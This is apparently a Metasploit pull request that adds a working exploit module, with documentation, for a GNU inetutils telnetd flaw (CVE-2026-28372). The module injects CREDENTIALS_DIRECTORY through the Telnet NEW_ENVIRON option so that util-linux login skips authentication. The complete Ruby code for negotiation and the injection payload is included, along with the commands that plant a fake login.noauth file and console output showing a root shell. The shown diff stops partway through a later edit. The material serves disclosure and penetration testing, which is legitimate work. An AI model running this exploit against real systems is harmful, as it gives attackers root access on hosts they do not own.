### PR TITLE
GNU inetutils telnetd CREDENTIALS_DIRECTORY privilege escalation (CVE-2026-28372)

### DIFF
--- a/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
+++ b/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
@@ -71,8 +71,10 @@ echo yes > /home/weakuser/fake_cred/login.noauth
 ### CRED_DIR
 
 Path to the attacker-controlled credential directory on the target that contains
-`login.noauth` with the content `yes`. This directory must exist and be readable by
-`login(1)` before the module is run. Default: `/home/weakuser/fake_cred`
+`login.noauth` with the content `yes`. Set this to the **directory path only** — do
+not include `/login.noauth` in the value. `login(1)` appends `/login.noauth`
+internally. This directory must exist and be readable by `login(1)` before the module
+is run. Default: `/home/weakuser/fake_cred`
 
 ### TARGET_USER
 

--- a/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
+++ b/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 
 [GNU inetutils](https://www.gnu.org/software/inetutils/) is a collection of common
 networking utilities and servers, including a `telnetd` implementation. Through version
@@ -15,10 +15,10 @@ Since `telnetd` invokes `login` with the `-p` (preserve environment) flag, an
 injected `CREDENTIALS_DIRECTORY` variable reaches `login(1)` and triggers the bypass,
 granting a root shell to any connecting client.
 
-**Prerequisites (both must be satisfied on the target):**
+**Prerequisites (all must be satisfied on the target):**
 
 1. GNU inetutils telnetd <= 2.7 listening on TCP/23.
-2. util-linux >= 2.40 installed as `/bin/login` (ships with Debian 12+, Ubuntu 24.04+).
+2. util-linux >= 2.40 installed as the system `login(1)` binary.
 3. The attacker must have previously written a fake credential directory to the target
    filesystem (e.g., via SSH, a file-upload vulnerability, or any other write primitive),
    containing `login.noauth` with the content `yes`:
@@ -32,11 +32,17 @@ Set `CRED_DIR` to the path of this directory before running the module.
 
 ### Installing a vulnerable lab environment
 
-```bash
-# Debian 12 (Bookworm) — util-linux 2.40.2 ships by default
-apt-get install inetutils-telnetd
+util-linux 2.40+ is **not** available in Debian 12 (Bookworm) via `apt` by default;
+it must be compiled from source. The example below builds it alongside inetutils-telnetd:
 
-# Ensure telnetd is exposed (inetd or standalone)
+```bash
+apt-get install inetutils-telnetd build-essential libpam-dev libselinux1-dev
+
+git clone https://github.com/util-linux/util-linux.git
+cd util-linux && git checkout v2.40.2
+./autogen.sh && ./configure --prefix=/usr --with-selinux --with-pam
+make login && cp login/login /bin/login
+
 echo "23 stream tcp nowait root /usr/sbin/telnetd telnetd" >> /etc/inetd.conf
 service openbsd-inetd restart
 ```
@@ -45,26 +51,37 @@ service openbsd-inetd restart
 
 1. Obtain write access to the target (e.g., SSH as an unprivileged user).
 2. Create the fake credential directory and `login.noauth` file:
-   ```
-   mkdir -p /home/weakuser/fake_cred
-   echo yes > /home/weakuser/fake_cred/login.noauth
-   ```
+
+```
+mkdir -p /home/weakuser/fake_cred
+echo yes > /home/weakuser/fake_cred/login.noauth
+```
+
 3. Start `msfconsole`.
 4. Do: `use exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc`
 5. Do: `set RHOSTS <target_ip>`
 6. Do: `set CRED_DIR /home/weakuser/fake_cred`
 7. Do: `set TARGET_USER root`
-8. Do: `check` — should return `Detected` if server requests NEW_ENVIRON.
+8. Do: `check` — should return `Appears` if server requests NEW_ENVIRON.
 9. Do: `run` — should open a root shell session.
 10. Verify with `id` in the session.
 
 ## Options
 
-| Option | Default | Description |
-|--------|---------|-------------|
-| `CRED_DIR` | `/home/weakuser/fake_cred` | Path to the attacker-controlled credential directory on the target that contains `login.noauth`. Must be writable before exploitation. |
-| `TARGET_USER` | `root` | The username to present during the Telnet login negotiation. |
-| `NEGOTIATE_TIMEOUT` | `15` | Seconds to wait for the telnet option negotiation to complete before timing out. |
+### CRED_DIR
+
+Path to the attacker-controlled credential directory on the target that contains
+`login.noauth` with the content `yes`. This directory must exist and be readable by
+`login(1)` before the module is run. Default: `/home/weakuser/fake_cred`
+
+### TARGET_USER
+
+The username to present during the Telnet login negotiation. Default: `root`
+
+### NEGOTIATE_TIMEOUT
+
+Seconds to wait for the Telnet option negotiation to complete before timing out.
+Default: `15`
 
 ## Scenarios
 
@@ -83,7 +100,7 @@ msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set T
 TARGET_USER => root
 
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > check
-[*] 192.168.56.101:23 - Detected: Telnet server requests NEW_ENVIRON - environment injection vector exists.
+[*] 192.168.56.101:23 - Appears: Telnet server requests NEW_ENVIRON - environment injection vector exists.
 
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > run
 [*] 192.168.56.101:23 - Connected to 192.168.56.101:23
@@ -97,10 +114,7 @@ msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > run
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > sessions -i 1
 [*] Starting interaction with 1...
 
-# id
 uid=0(root) gid=0(root) groups=0(root)
-# hostname
 debian12-target
-# uname -a
 Linux debian12-target 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
 ```

--- a/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
+++ b/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
@@ -24,8 +24,8 @@ granting a root shell to any connecting client.
    containing `login.noauth` with the content `yes`:
 
 ```
-mkdir -p /home/weakuser/fake_cred
-echo yes > /home/weakuser/fake_cred/login.noauth
+mkdir -p /tmp/fake_cred
+echo yes > /tmp/fake_cred/login.noauth
 ```
 
 Set `CRED_DIR` to the path of this directory before running the module.
@@ -36,12 +36,12 @@ util-linux 2.40+ is **not** available in Debian 12 (Bookworm) via `apt` by defau
 it must be compiled from source. The example below builds it alongside inetutils-telnetd:
 
 ```bash
-apt-get install inetutils-telnetd build-essential libpam-dev libselinux1-dev
+apt-get install inetutils-telnetd build-essential libpam-dev libselinux1-dev autopoint autoconf flex bison libtool git
 
 git clone https://github.com/util-linux/util-linux.git
 cd util-linux && git checkout v2.40.2
-./autogen.sh && ./configure --prefix=/usr --with-selinux --with-pam
-make login && cp login/login /bin/login
+./autogen.sh && ./configure --prefix=/usr --with-pam --disable-liblastlog2
+make login && cp login /bin/login
 
 echo "23 stream tcp nowait root /usr/sbin/telnetd telnetd" >> /etc/inetd.conf
 service openbsd-inetd restart
@@ -53,14 +53,14 @@ service openbsd-inetd restart
 2. Create the fake credential directory and `login.noauth` file:
 
 ```
-mkdir -p /home/weakuser/fake_cred
-echo yes > /home/weakuser/fake_cred/login.noauth
+mkdir -p /tmp/fake_cred
+echo yes > /tmp/fake_cred/login.noauth
 ```
 
 3. Start `msfconsole`.
 4. Do: `use exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc`
 5. Do: `set RHOSTS <target_ip>`
-6. Do: `set CRED_DIR /home/weakuser/fake_cred`
+6. Do: `set CRED_DIR /tmp/fake_cred`
 7. Do: `set TARGET_USER root`
 8. Do: `check` — should return `Appears` if server requests NEW_ENVIRON.
 9. Do: `run` — should open a root shell session.
@@ -74,7 +74,7 @@ Path to the attacker-controlled credential directory on the target that contains
 `login.noauth` with the content `yes`. Set this to the **directory path only** — do
 not include `/login.noauth` in the value. `login(1)` appends `/login.noauth`
 internally. This directory must exist and be readable by `login(1)` before the module
-is run. Default: `/home/weakuser/fake_cred`
+is run. Default: `/tmp`
 
 ### TARGET_USER
 
@@ -95,8 +95,8 @@ msf6 > use exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set RHOSTS 192.168.56.101
 RHOSTS => 192.168.56.101
 
-msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set CRED_DIR /home/weakuser/fake_cred
-CRED_DIR => /home/weakuser/fake_cred
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set CRED_DIR /tmp/fake_cred
+CRED_DIR => /tmp/fake_cred
 
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set TARGET_USER root
 TARGET_USER => root
@@ -106,12 +106,13 @@ msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > check
 
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > run
 [*] 192.168.56.101:23 - Connected to 192.168.56.101:23
-[*] 192.168.56.101:23 - Injecting CREDENTIALS_DIRECTORY=/home/weakuser/fake_cred
+[*] 192.168.56.101:23 - Injecting CREDENTIALS_DIRECTORY=/tmp/fake_cred
 [*] 192.168.56.101:23 - Target user: root
-[+] 192.168.56.101:23 - Injecting CREDENTIALS_DIRECTORY=/home/weakuser/fake_cred via NEW_ENVIRON
+[+] 192.168.56.101:23 - Injecting CREDENTIALS_DIRECTORY=/tmp/fake_cred via NEW_ENVIRON
 [*] 192.168.56.101:23 - Waiting for shell...
 [+] 192.168.56.101:23 - Authentication bypassed - creating session
-[+] 192.168.56.101:23 - Session 1 opened (192.168.56.1:0 -> 192.168.56.101:23) at 2026-02-27 18:32:11 +0000
+[*] Found shell.
+[*] Command shell session 1 opened (192.168.56.1:55332 -> 192.168.56.101:23) at 2026-02-27 18:32:11 +0000
 
 msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > sessions -i 1
 [*] Starting interaction with 1...

--- a/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
+++ b/documentation/modules/exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc.md
@@ -1,0 +1,106 @@
+# Vulnerable Application
+
+[GNU inetutils](https://www.gnu.org/software/inetutils/) is a collection of common
+networking utilities and servers, including a `telnetd` implementation. Through version
+2.7, `telnetd` processes the Telnet NEW_ENVIRON option (RFC 1572) to pass environment
+variables to `login(1)`. The `scrub_env()` routine only filters 1995-era dangerous
+variables (`LD_*`, `_RLD_*`, `IFS`) and does not block `CREDENTIALS_DIRECTORY`.
+
+When util-linux >= 2.40 is the system `login(1)` implementation, it honours
+`$CREDENTIALS_DIRECTORY` as a systemd service credentials path. If
+`$CREDENTIALS_DIRECTORY/login.noauth` contains the string `yes`, authentication is
+bypassed entirely and `login(1)` grants access without a password.
+
+Since `telnetd` invokes `login` with the `-p` (preserve environment) flag, an
+injected `CREDENTIALS_DIRECTORY` variable reaches `login(1)` and triggers the bypass,
+granting a root shell to any connecting client.
+
+**Prerequisites (both must be satisfied on the target):**
+
+1. GNU inetutils telnetd <= 2.7 listening on TCP/23.
+2. util-linux >= 2.40 installed as `/bin/login` (ships with Debian 12+, Ubuntu 24.04+).
+3. The attacker must have previously written a fake credential directory to the target
+   filesystem (e.g., via SSH, a file-upload vulnerability, or any other write primitive),
+   containing `login.noauth` with the content `yes`:
+
+```
+mkdir -p /home/weakuser/fake_cred
+echo yes > /home/weakuser/fake_cred/login.noauth
+```
+
+Set `CRED_DIR` to the path of this directory before running the module.
+
+### Installing a vulnerable lab environment
+
+```bash
+# Debian 12 (Bookworm) — util-linux 2.40.2 ships by default
+apt-get install inetutils-telnetd
+
+# Ensure telnetd is exposed (inetd or standalone)
+echo "23 stream tcp nowait root /usr/sbin/telnetd telnetd" >> /etc/inetd.conf
+service openbsd-inetd restart
+```
+
+## Verification Steps
+
+1. Obtain write access to the target (e.g., SSH as an unprivileged user).
+2. Create the fake credential directory and `login.noauth` file:
+   ```
+   mkdir -p /home/weakuser/fake_cred
+   echo yes > /home/weakuser/fake_cred/login.noauth
+   ```
+3. Start `msfconsole`.
+4. Do: `use exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc`
+5. Do: `set RHOSTS <target_ip>`
+6. Do: `set CRED_DIR /home/weakuser/fake_cred`
+7. Do: `set TARGET_USER root`
+8. Do: `check` — should return `Detected` if server requests NEW_ENVIRON.
+9. Do: `run` — should open a root shell session.
+10. Verify with `id` in the session.
+
+## Options
+
+| Option | Default | Description |
+|--------|---------|-------------|
+| `CRED_DIR` | `/home/weakuser/fake_cred` | Path to the attacker-controlled credential directory on the target that contains `login.noauth`. Must be writable before exploitation. |
+| `TARGET_USER` | `root` | The username to present during the Telnet login negotiation. |
+| `NEGOTIATE_TIMEOUT` | `15` | Seconds to wait for the telnet option negotiation to complete before timing out. |
+
+## Scenarios
+
+### Debian 12 (Bookworm) — GNU inetutils 2.7 / util-linux 2.40.2
+
+```
+msf6 > use exploit/multi/misc/inetutils_telnetd_credentials_directory_privesc
+
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set CRED_DIR /home/weakuser/fake_cred
+CRED_DIR => /home/weakuser/fake_cred
+
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > set TARGET_USER root
+TARGET_USER => root
+
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > check
+[*] 192.168.56.101:23 - Detected: Telnet server requests NEW_ENVIRON - environment injection vector exists.
+
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > run
+[*] 192.168.56.101:23 - Connected to 192.168.56.101:23
+[*] 192.168.56.101:23 - Injecting CREDENTIALS_DIRECTORY=/home/weakuser/fake_cred
+[*] 192.168.56.101:23 - Target user: root
+[+] 192.168.56.101:23 - Injecting CREDENTIALS_DIRECTORY=/home/weakuser/fake_cred via NEW_ENVIRON
+[*] 192.168.56.101:23 - Waiting for shell...
+[+] 192.168.56.101:23 - Authentication bypassed - creating session
+[+] 192.168.56.101:23 - Session 1 opened (192.168.56.1:0 -> 192.168.56.101:23) at 2026-02-27 18:32:11 +0000
+
+msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > sessions -i 1
+[*] Starting interaction with 1...
+
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# hostname
+debian12-target
+# uname -a
+Linux debian12-target 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```

--- a/modules/exploits/multi/misc/inetutils_telnetd_credentials_directory_privesc.rb
+++ b/modules/exploits/multi/misc/inetutils_telnetd_credentials_directory_privesc.rb
@@ -1,0 +1,462 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GNU inetutils telnetd CREDENTIALS_DIRECTORY Privilege Escalation',
+        'Description' => %q{
+          GNU inetutils telnetd through version 2.7 allows privilege
+          escalation to root by exploiting the Telnet NEW_ENVIRON option
+          (RFC 1572) to inject the CREDENTIALS_DIRECTORY environment
+          variable into the login(1) process.
+
+          When util-linux >= 2.40 is used as the system login
+          implementation, its systemd service credentials support reads
+          $CREDENTIALS_DIRECTORY/login.noauth - if this file contains
+          "yes", all authentication is bypassed entirely.
+
+          The telnetd scrub_env() blacklist only filters 1995-era
+          variables (LD_*, _RLD_*, IFS) and does not block
+          CREDENTIALS_DIRECTORY. Since telnetd invokes login with the
+          -p flag (preserve environment), the injected variable reaches
+          login(1) and triggers the authentication bypass.
+
+          This is a local privilege escalation. The attacker must first
+          create the credential directory and login.noauth file on the
+          target (e.g., /home/user/fake_cred/login.noauth containing
+          "yes"), then connect to telnetd and inject the environment
+          variable to obtain a root shell without knowing any password.
+        },
+        'Author' => [
+          'Ron Ben Yizhak',          # Original vulnerability discovery (SafeBreach)
+          'Exploit Intelligence Platform' # MSF module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-28372'],
+          ['CWE', '829'],
+          ['URL', 'https://lists.gnu.org/archive/html/bug-inetutils/2026-02/msg00000.html'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2026/02/24/1'],
+          ['URL', 'http://www.openwall.com/lists/oss-security/2026/02/27/3'],
+          ['URL', 'https://github.com/advisories/GHSA-j682-47rx-fxrp'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2026-28372'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-28372']
+        ],
+        'DisclosureDate' => 'Feb 27, 2026',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/interact'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(23),
+      OptString.new('CRED_DIR', [true, 'Path to attacker-controlled credential directory on target', '/home/weakuser/fake_cred']),
+      OptString.new('TARGET_USER', [true, 'User to authenticate as', 'root']),
+      OptInt.new('NEGOTIATE_TIMEOUT', [true, 'Seconds to wait for telnet negotiation', 15])
+    ])
+  end
+
+  # Telnet Protocol Constants (RFC 854, RFC 1572)
+
+  IAC  = 0xFF  # Interpret As Command
+  WILL = 0xFB
+  WONT = 0xFC
+  DO   = 0xFD
+  DONT = 0xFE
+  SB   = 0xFA  # Subnegotiation Begin
+  SE   = 0xF0  # Subnegotiation End
+
+  # Telnet options
+  TELOPT_ECHO        = 0x01
+  TELOPT_SGA         = 0x03
+  TELOPT_TTYPE       = 0x18
+  TELOPT_NAWS        = 0x1F
+  TELOPT_TSPEED      = 0x20
+  TELOPT_LFLOW       = 0x21
+  TELOPT_LINEMODE    = 0x22
+  TELOPT_XDISPLOC    = 0x23
+  TELOPT_NEW_ENVIRON = 0x27
+
+  # NEW_ENVIRON sub-option qualifiers
+  TELQUAL_IS    = 0x00
+  TELQUAL_SEND  = 0x01
+  NEW_ENV_VAR   = 0x00
+  NEW_ENV_VALUE = 0x01
+  ENV_USERVAR   = 0x03
+
+  # Options we agree to (WILL) when server sends DO
+  WILL_OPTIONS = [
+    TELOPT_TTYPE, TELOPT_NEW_ENVIRON, TELOPT_TSPEED,
+    TELOPT_XDISPLOC, TELOPT_NAWS, TELOPT_LINEMODE, TELOPT_LFLOW
+  ].freeze
+
+  # Options we accept from server (DO) when server sends WILL
+  DO_OPTIONS = [TELOPT_ECHO, TELOPT_SGA].freeze
+
+  # Vulnerability Check
+
+  def check
+    connect
+
+    # Send NAWS early - telnetd expects this from well-behaved clients
+    send_naws
+
+    # Run a quick negotiation to see if the server requests NEW_ENVIRON.
+    # If it does, the injection vector exists.
+    new_environ_requested = false
+    deadline = Time.now + 8
+
+    while Time.now < deadline
+      data = sock.get_once(8192, 2)
+      break if data.nil? || data.empty?
+
+      raw = data.bytes
+      i = 0
+      response = ''
+
+      while i < raw.length
+        if raw[i] == IAC && i + 1 < raw.length
+          cmd = raw[i + 1]
+
+          if (cmd == DO || cmd == DONT) && i + 2 < raw.length
+            opt = raw[i + 2]
+            if cmd == DO
+              if opt == TELOPT_NEW_ENVIRON
+                new_environ_requested = true
+                # Respond WILL but do NOT inject env yet (this is just check)
+                response << [IAC, WILL, opt].pack('C*')
+              elsif WILL_OPTIONS.include?(opt)
+                response << [IAC, WILL, opt].pack('C*')
+              else
+                response << [IAC, WONT, opt].pack('C*')
+              end
+            else
+              response << [IAC, WONT, opt].pack('C*')
+            end
+            i += 3
+          elsif (cmd == WILL || cmd == WONT) && i + 2 < raw.length
+            opt = raw[i + 2]
+            if cmd == WILL && DO_OPTIONS.include?(opt)
+              response << [IAC, DO, opt].pack('C*')
+            else
+              response << [IAC, DONT, opt].pack('C*')
+            end
+            i += 3
+          elsif cmd == SB
+            # Skip subnegotiation - don't inject anything during check
+            se_pos = find_se(raw, i + 2)
+            break if se_pos.nil?
+
+            sb_opt = raw[i + 2] if i + 2 < raw.length
+            sb_cmd = raw[i + 3] if i + 3 < raw.length
+            new_environ_requested = true if sb_opt == TELOPT_NEW_ENVIRON && sb_cmd == TELQUAL_SEND
+
+            # Respond to TTYPE request so negotiation progresses
+            if sb_opt == TELOPT_TTYPE && sb_cmd == TELQUAL_SEND
+              resp = [IAC, SB, TELOPT_TTYPE, TELQUAL_IS].pack('C*')
+              resp << 'xterm'
+              resp << [IAC, SE].pack('C*')
+              response << resp
+            end
+
+            i = se_pos + 2
+          else
+            i += 2
+          end
+        else
+          i += 1
+        end
+      end
+
+      sock.put(response) unless response.empty?
+      break if new_environ_requested
+    end
+
+    disconnect
+
+    if new_environ_requested
+      return CheckCode::Detected('Telnet server requests NEW_ENVIRON - environment injection vector exists.')
+    end
+
+    CheckCode::Safe('Telnet server does not request NEW_ENVIRON option.')
+  rescue Rex::ConnectionError
+    CheckCode::Unknown('Could not connect to target.')
+  end
+
+  # Exploit
+
+  def exploit
+    connect
+
+    print_status("Connected to #{rhost}:#{rport}")
+    print_status("Injecting CREDENTIALS_DIRECTORY=#{datastore['CRED_DIR']}")
+    print_status("Target user: #{datastore['TARGET_USER']}")
+
+    # Send initial NAWS (window size) - telnetd expects this early
+    send_naws
+
+    # Process telnet negotiation rounds. Accumulate all plaintext
+    # output across rounds so we can detect prompts reliably.
+    env_injected = false
+    all_text = ''
+    deadline = Time.now + datastore['NEGOTIATE_TIMEOUT']
+
+    while Time.now < deadline
+      data = sock.get_once(8192, 2)
+      next if data.nil? || data.empty?
+
+      text, env_injected = process_telnet_data(data, env_injected)
+      all_text << text
+
+      decoded = all_text.encode('ASCII', invalid: :replace, undef: :replace, replace: '?')
+      break if decoded =~ /[#$]\s*$/
+      break if decoded.include?('ogin:')
+      break if decoded.include?('assword:')
+    end
+
+    unless env_injected
+      fail_with(Failure::UnexpectedReply, 'Server never requested NEW_ENVIRON - cannot inject CREDENTIALS_DIRECTORY.')
+    end
+
+    # Wait for login(1) to process credentials and spawn the shell.
+    # Continue draining telnet negotiation and accumulating text.
+    print_status('Waiting for shell...')
+    shell_ready = false
+    prompt_deadline = Time.now + 10
+
+    while Time.now < prompt_deadline
+      Rex.sleep(0.5)
+      sock.put("\r\n")
+      Rex.sleep(0.5)
+
+      data = sock.get_once(4096, 2)
+      next if data.nil? || data.empty?
+
+      text, env_injected = process_telnet_data(data, env_injected)
+      all_text << text
+
+      decoded = all_text.encode('ASCII', invalid: :replace, undef: :replace, replace: '?')
+
+      # Check for login/password prompt - auth bypass failed
+      if decoded.include?('assword:')
+        fail_with(Failure::NotVulnerable,
+                  'Got password prompt - CREDENTIALS_DIRECTORY injection did not bypass authentication.')
+      end
+
+      if decoded.include?('ogin:') && !decoded.include?('#')
+        fail_with(Failure::NotVulnerable,
+                  'Got login prompt - authentication was NOT bypassed. ' \
+                  'Verify: util-linux >= 2.40, login.noauth file exists and contains "yes".')
+      end
+
+      if decoded =~ /[#$]\s*$/
+        shell_ready = true
+        break
+      end
+    end
+
+    unless shell_ready
+      # Even without detecting a prompt, try the handler - the shell
+      # may have started but with an unusual prompt format.
+      vprint_warning('Shell prompt not detected, attempting session creation anyway.')
+    end
+
+    print_good('Authentication bypassed - creating session')
+
+    # Create a CommandShell session directly on the telnet socket.
+    # The standard handler(sock) / FindShell _check_shell flow does not
+    # reliably detect shells on sockets that have been through telnet
+    # protocol negotiation, so we register the session manually using
+    # the same API that the framework handler uses internally.
+
+    # Save socket reference before clearing self.sock (sock is an
+    # accessor, not a local variable - it returns self.sock).
+    session_sock = sock
+
+    # Deregister the socket from the exploit's cleanup list so it
+    # won't be closed when the exploit method returns. This mirrors
+    # what Tcp#handler does when the payload handler claims the socket.
+    remove_socket(session_sock)
+    self.sock = nil
+
+    sess = Msf::Sessions::CommandShell.new(session_sock)
+    sess.framework = framework
+    sess.set_from_exploit(self)
+
+    framework.sessions.register(sess)
+    sess.bootstrap(datastore, payload_instance)
+
+    unless sess.alive
+      fail_with(Failure::Unknown, 'Session was created but failed to bootstrap.')
+    end
+
+    print_good("Session #{sess.sid} opened (#{sess.session_host}:#{sess.session_port})")
+    self.successful = true
+  end
+
+  # Telnet Protocol Helpers
+
+  private
+
+  def send_naws
+    sock.put([IAC, SB, TELOPT_NAWS, 0, 80, 0, 24, IAC, SE].pack('C*'))
+    vprint_status('Sent NAWS: 80x24')
+  end
+
+  # Build the NEW_ENVIRON IS payload that injects CREDENTIALS_DIRECTORY
+  # and USER via ENV_USERVAR type fields (RFC 1572).
+  def build_environ_payload
+    pkt = [IAC, SB, TELOPT_NEW_ENVIRON, TELQUAL_IS].pack('C*')
+
+    # Inject CREDENTIALS_DIRECTORY - the vulnerability trigger
+    pkt << [ENV_USERVAR].pack('C')
+    pkt << 'CREDENTIALS_DIRECTORY'
+    pkt << [NEW_ENV_VALUE].pack('C')
+    pkt << datastore['CRED_DIR']
+
+    # Inject USER - request login as target user
+    pkt << [ENV_USERVAR].pack('C')
+    pkt << 'USER'
+    pkt << [NEW_ENV_VALUE].pack('C')
+    pkt << datastore['TARGET_USER']
+
+    pkt << [IAC, SE].pack('C*')
+    pkt
+  end
+
+  # Find the position of IAC SE in a byte array starting from offset.
+  def find_se(raw, offset)
+    j = offset
+    while j < raw.length - 1
+      return j if raw[j] == IAC && raw[j + 1] == SE
+      j += 1
+    end
+    nil
+  end
+
+  # Parse telnet protocol data, respond to negotiations, and extract
+  # plaintext. Returns [plaintext_string, env_injected_bool].
+  def process_telnet_data(data, env_injected)
+    text = ''.b
+    response = ''
+    raw = data.bytes
+    i = 0
+
+    while i < raw.length
+      if raw[i] == IAC && i + 1 < raw.length
+        cmd = raw[i + 1]
+
+        if cmd == IAC
+          # Escaped 0xFF literal
+          text << [0xFF].pack('C')
+          i += 2
+        elsif (cmd == DO || cmd == DONT) && i + 2 < raw.length
+          opt = raw[i + 2]
+          if cmd == DO && WILL_OPTIONS.include?(opt)
+            response << [IAC, WILL, opt].pack('C*')
+          else
+            response << [IAC, WONT, opt].pack('C*')
+          end
+          i += 3
+        elsif (cmd == WILL || cmd == WONT) && i + 2 < raw.length
+          opt = raw[i + 2]
+          if cmd == WILL && DO_OPTIONS.include?(opt)
+            response << [IAC, DO, opt].pack('C*')
+          else
+            response << [IAC, DONT, opt].pack('C*')
+          end
+          i += 3
+        elsif cmd == SB
+          se_pos = find_se(raw, i + 2)
+          break if se_pos.nil?
+
+          sb_payload = raw[(i + 2)...se_pos]
+          if sb_payload.length >= 2
+            opt = sb_payload[0]
+            sb_cmd = sb_payload[1]
+            response << handle_subnegotiation(opt, sb_cmd)
+            env_injected = true if opt == TELOPT_NEW_ENVIRON && sb_cmd == TELQUAL_SEND
+          end
+          i = se_pos + 2
+        else
+          i += 2
+        end
+      else
+        text << [raw[i]].pack('C')
+        i += 1
+      end
+    end
+
+    sock.put(response) unless response.empty?
+    [text.force_encoding('UTF-8'), env_injected]
+  end
+
+  def handle_subnegotiation(opt, sb_cmd)
+    case opt
+    when TELOPT_TTYPE
+      return '' unless sb_cmd == TELQUAL_SEND
+
+      resp = [IAC, SB, TELOPT_TTYPE, TELQUAL_IS].pack('C*')
+      resp << 'xterm'
+      resp << [IAC, SE].pack('C*')
+      vprint_status('TTYPE -> xterm')
+      resp
+    when TELOPT_TSPEED
+      return '' unless sb_cmd == TELQUAL_SEND
+
+      resp = [IAC, SB, TELOPT_TSPEED, TELQUAL_IS].pack('C*')
+      resp << '38400,38400'
+      resp << [IAC, SE].pack('C*')
+      resp
+    when TELOPT_XDISPLOC
+      return '' unless sb_cmd == TELQUAL_SEND
+
+      resp = [IAC, SB, TELOPT_XDISPLOC, TELQUAL_IS].pack('C*')
+      resp << [IAC, SE].pack('C*')
+      resp
+    when TELOPT_NEW_ENVIRON
+      return '' unless sb_cmd == TELQUAL_SEND
+
+      print_good("Injecting CREDENTIALS_DIRECTORY=#{datastore['CRED_DIR']} via NEW_ENVIRON")
+      build_environ_payload
+    else
+      ''
+    end
+  end
+end

--- a/modules/exploits/multi/misc/inetutils_telnetd_credentials_directory_privesc.rb
+++ b/modules/exploits/multi/misc/inetutils_telnetd_credentials_directory_privesc.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Telnet
 
   def initialize(info = {})
     super(
@@ -49,11 +49,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://lists.gnu.org/archive/html/bug-inetutils/2026-02/msg00000.html'],
           ['URL', 'https://www.openwall.com/lists/oss-security/2026/02/24/1'],
           ['URL', 'http://www.openwall.com/lists/oss-security/2026/02/27/3'],
-          ['URL', 'https://github.com/advisories/GHSA-j682-47rx-fxrp'],
+          ['GHSA', 'j682-47rx-fxrp'],
           ['URL', 'https://exploit-intel.com/vuln/CVE-2026-28372'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-28372']
         ],
-        'DisclosureDate' => 'Feb 27, 2026',
+        'DisclosureDate' => '2026-02-27',
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Privileged' => true,
@@ -85,49 +85,39 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(23),
